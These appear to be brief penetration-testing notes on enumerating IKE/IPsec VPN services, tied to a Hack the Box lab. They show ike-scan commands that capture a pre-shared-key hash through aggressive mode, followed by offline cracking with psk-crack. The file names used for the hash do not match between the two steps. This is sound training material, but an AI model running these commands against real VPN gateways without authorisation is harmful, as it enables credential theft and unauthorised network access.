# **Basic Information** # **Enumeration** ## **Scanning** ```bash # determine valid transformation sudo apt install ike-scan sudo ike-scan -M <target_ip> ``` ## **Gather Hashes** ```bash # if PSK is used as the Auth type, use Aggressive mode to obtain the user's hash for offline cracking sudo ike-scan -P -M -A -n <fakeID> --pskcrack=hash.txt <target_ip> psk-crack -d wordlist.txt hashes.txt ``` # **References** # **Practical Application** | Platform | Name | Notes | | ----------------- | -------------- | ----- | | Hack the Box Labs | [[Expressway]] | |